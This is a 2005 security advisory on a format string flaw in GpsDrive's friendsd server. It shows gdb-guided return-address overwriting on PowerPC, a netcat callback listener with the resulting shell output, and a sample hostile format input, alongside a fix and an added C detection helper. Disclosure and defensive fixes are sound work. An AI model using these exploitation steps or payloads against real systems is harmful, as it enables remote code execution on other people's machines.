DMA-2005-1104a.txt
Posted Nov 5, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

The friendsd server that comes with GpsDrive contains an obvious format string issue compliments of a bad fprintf() call.

tags | advisory
SHA-256 | ec70d84c5f0cca691f8ba58bee71f8d6fe7cc9f04578b31c5892e4614ff209f0

DMA[2005-1104a] - 'GpsDrive friendsd2 format string vulnerability'
Author: Kevin Finisterre
Vendor: https://www.gpsdrive.cc/
Product: 'GpsDrive'
References: https://www.digitalmunition.com/DMA[2005-1104a].txt

Description:
GpsDrive is a car (bike, ship, plane) navigation system. It can display positioning information
provided from a NMEA capable GPS receiver on a zoomable map. Map file autoselecting is done based
on the current position and the preferred map scale. All Garmin GPS receivers with a serial output
should be usable, as well as other GPS receivers that support the NMEA protocol. GpsDrive was written
in C with use of the GTK+ graphic toolkit and it runs on Linux and FreeBSD. With minimal work it
is also possible to run GpsDrive on Windows and on OSX.

GpsDrive comes with a server program called friendsd which acts as a server for the position of your
friends. You see the position of your friends as a car symbol on the map, including the name, time,
day of week and the speed of their last connection. A blue arrow shows the last reported direction of
your friend. Fritz Ganter has blatantly stated in the man page that "The (friendsd) server was NOT
tested for security".

Please note that friendsd no longer runs as root since the last round of security patches.
kfinisterre:/home/kfinisterre# friendsd2
server: please don't run me as root

The friendsd server does contain an obvious format string issue, compliments of a bad fprintf() call
in which the peer-supplied buffer is passed as the format argument:
./src/friendsd.c:367: fprintf (stderr, txt);

Exploitation of this bug is fairly trivial; on powerpc I chose to overwrite a saved return address
as shown below.

First I just crashed the program and went to frame 2:
0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
(gdb) bt
#0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
#1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
#2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
#3 0x100024b8 in dg_echo ()
#4 0x10002f28 in main ()

Next I grab the address of Arglist for frame 2 and overwrite that +4:
(gdb) i f
Stack level 2, frame at 0x7fffad70:
pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
called by frame at 0x7fffae00, caller of frame at 0x7fff8700
Arglist at 0x7fffad70, args:
Locals at 0x7fffad70, Previous frame's sp in r1

(gdb) x/a 0x7fffad70+4
0x7fffad74: 0xf6825d0 <fprintf+112> (overwrite this)

animosity:/home/kfinisterre$ nc -l -p 31337 -vvv
listening on [any] 31337 ...

animosity:/home/kfinisterre$ ./gpsdrive-ex-long-ppc.pl
$VAR1 = {};

192.168.1.1: inverse host lookup failed: Unknown host
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
id;
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

Workaround:
Stop using friendsd2, or simply change the above-mentioned fprintf() call to the following, so that
the untrusted text is an argument rather than the format string.
fprintf (stderr,"%s",txt);
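Added example (not code from the advisory or from GpsDrive): the workaround above applied to a bounded buffer, next to a small detection helper that a test harness or log scrubber can use to flag peer-supplied strings carrying conversion directives. SAMPLE_INPUT is a constructed string, and count_format_directives() and format_message() are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample of a peer-supplied string (not from the advisory):
 * it carries conversion directives that would be interpreted if the
 * string were ever used as a format argument. */
static const char SAMPLE_INPUT[] = "name: %x %x %s %n";

/* Detection helper for fuzzers, log scrubbers or unit tests: counts the
 * conversion directives a string would drive as a format argument.
 * A doubled "%%" is a literal percent sign and does not count. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* The advisory's workaround with a bounded destination: the format
 * string is a constant and the untrusted text is an argument, so its
 * '%' sequences are copied verbatim instead of being interpreted.
 * Returns the number of characters written (excluding the terminator),
 * or -1 when the text did not fit or an encoding error occurred. */
int format_message(char *dst, size_t cap, const char *txt)
{
    int len = snprintf(dst, cap, "%s", txt);
    if (len < 0 || (size_t)len >= cap)
        return -1;
    return len;
}

int main(void)
{
    char buf[64];
    printf("directives in sample: %d\n", count_format_directives(SAMPLE_INPUT));
    if (format_message(buf, sizeof buf, SAMPLE_INPUT) >= 0)
        printf("logged verbatim: %s\n", buf);
    return 0;
}
```

Compiling with -Wformat-security (GCC and Clang) also flags the original fprintf(stderr, txt) pattern at build time, which is the cheapest check to keep in a CI pipeline.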

Timeline associated with this bug:
I emailed Fritz Ganter (ganter@ganter.at) at least twice about this and got no response.

-KF
